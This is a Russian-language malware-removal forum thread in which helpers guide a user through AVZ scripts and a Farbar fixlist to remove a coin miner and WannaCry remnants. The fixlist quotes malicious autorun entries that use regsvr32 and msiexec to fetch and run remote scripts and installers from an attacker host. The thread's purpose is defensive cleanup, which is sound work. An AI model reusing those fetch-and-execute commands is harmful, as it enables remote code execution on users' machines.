После пару минут работы ПК, ЦП грузит до 100% "утилитой атрибутов".
[COLOR=#000000]MD5 карантина: [/COLOR][COLOR=#000000]B5E7D6C88A4485368E72F61AB4C01740[/COLOR]
Printable View
После пару минут работы ПК, ЦП грузит до 100% "утилитой атрибутов".
[COLOR=#000000]MD5 карантина: [/COLOR][COLOR=#000000]B5E7D6C88A4485368E72F61AB4C01740[/COLOR]
Уважаемый(ая) [B]Kiril233[/B], спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
[url]https://virusinfo.info/pravila.html[/url]
[COLOR=#333333]После пару минут работы ПК, ЦП грузит до 100% "утилитой атрибутов".[/COLOR]
Выполните скрипт в AVZ
[code]begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('C:\Windows\help\lsmosee.exe','');
QuarantineFile('C:\Windows\syswow64\lsmos.exe','');
QuarantineFile('c:\windows\debug\ok.dat','');
QuarantineFile('c:\windows\debug\item.dat','');
QuarantineFile('C:\ProgramData\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\attrib.tmp','');
QuarantineFile('C:\Users\kiril\AppData\Local\bsjshdbfb6c9167c-b5db-42d8-90cb-acdb852d4b76\dllhost.exe','');
TerminateProcessByName('c:\programdata\macromedia\flash player\macromedia.com\support\flashplayer\sys\errorcheck.exe');
QuarantineFile('c:\programdata\macromedia\flash player\macromedia.com\support\flashplayer\sys\errorcheck.exe','');
TerminateProcessByName('c:\windows\mssecsvr.exe');
QuarantineFile('c:\windows\mssecsvr.exe','');
DeleteFile('c:\windows\mssecsvr.exe','32');
DeleteFile('c:\programdata\macromedia\flash player\macromedia.com\support\flashplayer\sys\errorcheck.exe','32');
DeleteFile('C:\Users\kiril\AppData\Local\bsjshdbfb6c9167c-b5db-42d8-90cb-acdb852d4b76\dllhost.exe','32');
RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\RunOnce','Microsoft Windows Update');
DeleteFile('C:\ProgramData\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\attrib.tmp','32');
DeleteFile('C:\Windows\system32\Tasks\Macromedia\ErrorCheck','64');
DeleteFile('c:\windows\debug\item.dat','32');
DeleteFile('c:\windows\debug\ok.dat','32');
DeleteFile('C:\Windows\system32\Tasks\ok','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa3','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa2','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa1','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa','64');
DeleteFile('C:\Windows\syswow64\lsmos.exe','32');
DeleteFile('C:\Windows\help\lsmosee.exe','32');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.[/code][list][*]Обратите внимание: будет выполнена [b]перезагрузка компьютера[/b].[/list]
Выполните скрипт в AVZ
[code]begin
CreateQurantineArchive('c:\quarantine.zip');
end.[/code][b]c:\quarantine.zip[/b] пришлите по красной ссылке [color="Red"][u][b]Прислать запрошенный карантин[/b][/u][/color] [b]над первым сообщением[/b] темы.
[b][color="Red"]Пожалуйста, ЕЩЕ РАЗ запустите Autologger, прикрепите к следующему сообщению НОВЫЕ логи. [/color][/b]
прикрепляю логи
Скачайте [url=https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]https://i.imgur.com/NAAC5Ba.png[/img] и сохраните на Рабочем столе.
[list][*][b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.[/list]
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.
2. Убедитесь, что в окне [b]Optional Scan[/b] отмечены [i]List BCD[/i], [i]Driver MD5[/i] и [i]90 Days Files[/i].
[img]https://i.imgur.com/3munStB.png[/img]
3. Нажмите кнопку [b]Scan[/b].
4. После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет ([b]Addition.txt[/b]).
6. Отчеты, полученные в пунктах 4 и 5, заархивируйте (в [b]один архив[/b]) и прикрепите к сообщению.
Прикрепляю логи
1. Откройте [b]Блокнот[/b] и скопируйте в него приведенный ниже текст
[code]
CreateRestorePoint:
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.5b6b7b.ru:280/v.sct scrobj.dll <==== ATTENTION
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.5b6b7b.ru:280/helloworld.msi /q <==== ATTENTION
CHR HKLM-x32\...\Chrome\Extension: [bejnpnkhfgfkcpgikiinojlmdcjimobi] - hxxp://clients2.google.com/service/update2/crx
S2 mssecsvc2.0; C:\WINDOWS\mssecsvc.exe -m security [X]
2018-02-14 16:18 - 2018-02-16 21:55 - 002061938 ____S C:\Windows\tasksche.exe
2018-02-14 16:18 - 2018-02-16 21:55 - 002061938 ____S C:\Windows\qeriuwjhrf
2018-02-16 19:54 - 2018-02-16 19:54 - 014353934 _____ () C:\ProgramData\havash.exe
2018-02-18 22:12 - 2018-02-18 22:12 - 000007680 _____ () C:\ProgramData\inject.exe
2018-02-17 22:50 - 2018-02-18 11:00 - 000007680 _____ () C:\ProgramData\Morihaus.exe
2018-02-16 19:54 - 2018-02-16 19:54 - 014353934 _____ () C:\Users\Все пользователи\havash.exe
2018-02-18 22:12 - 2018-02-18 22:12 - 000007680 _____ () C:\Users\Все пользователи\inject.exe
2018-02-17 22:50 - 2018-02-18 11:00 - 000007680 _____ () C:\Users\Все пользователи\Morihaus.exe
Task: {F5D1CD07-04A6-4881-9DC2-A4FEDEF10235} - \Macromedia\ErrorCheck -> No File <==== ATTENTION
Task: {F98F6D41-248C-4DA1-BD20-62A36DF6B3DB} - \Mysa3 -> No File <==== ATTENTION
Task: {FFBF6976-018D-4472-931E-12FC384E18B0} - \Mysa2 -> No File <==== ATTENTION
Task: {C10080F8-4BFD-4CDD-8BA7-20F9CCE50320} - \Mysa1 -> No File <==== ATTENTION
Task: {6CD5DE65-BDF0-448D-89CE-F9EFD1ED53A4} - \Mysa -> No File <==== ATTENTION
Task: {47E9DABF-4E96-4907-8CF6-1BF6B1E2A486} - \ok -> No File <==== ATTENTION
Reboot:
[/code]
2. Нажмите [b]Файл[/b] – [b]Сохранить как[/b]
3. Выберите папку, откуда была запущена утилита [b]Farbar Recovery Scan Tool[/b]
4. Укажите [b]Тип файла[/b] – [b]Все файлы (*.*)[/b]
5. Введите имя файла [b]fixlist.txt[/b] и нажмите кнопку [b]Сохранить[/b]
6. Запустите FRST, нажмите один раз на кнопку [b]Fix[/b] и подождите. Программа создаст лог-файл ([b]Fixlog.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.
[list][*]Обратите внимание: будет выполнена [b]перезагрузка компьютера[/b].[/list]
прикрепляю логи
Проблема решена?
Да, спасибо!
Кроме майнера, у Вас были обнаружены следы вируса-шифратора WannaCry. Установите все доступные обновления для операционной системы
Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]2[/B][*]Обработано файлов: [B]24[/B][*]В ходе лечения обнаружены вредоносные программы:
[LIST=1][*] c:\programdata\macromedia\flash player\macromedia.com\support\flashplayer\sys\errorcheck.exe - [B]HEUR:Trojan.Win32.Generic[/B][*] c:\users\kiril\appdata\local\bsjshdbfb6c9167c-b5db-42d8-90cb-acdb852d4b76\dllhost.exe - [B]HEUR:Trojan.Win32.Generic[/B] ( BitDefender: Generic.Malware.Sdld!!.A0E0B363 )[*] c:\users\kiril\appdata\local\23utg42g3kihfdbb6c9167c-b5db-42d8-90cb-acdb852d4b76\dllhost.exe - [B]HEUR:Trojan.Win32.Generic[/B] ( BitDefender: Generic.Malware.Sdld!!.A112712C )[*] c:\windows\help\lsmosee.exe - [B]HEUR:Trojan.Win32.Generic[/B][*] c:\windows\help\lsmosee.exe - [B]UDS:DangerousObject.Multi.Generic[/B][*] c:\windows\mssecsvr.exe - [B]Trojan-Ransom.Win32.Wanna.m[/B] ( BitDefender: Gen:Trojan.Heur.RP.lsY@aaoNlSni )[*] c:\windows\syswow64\lsmos.exe - [B]not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen[/B][*] c:\windows\syswow64\lsmos.exe - [B]not-a-virus:RiskTool.Win32.BitMiner.aac[/B][/LIST][/LIST]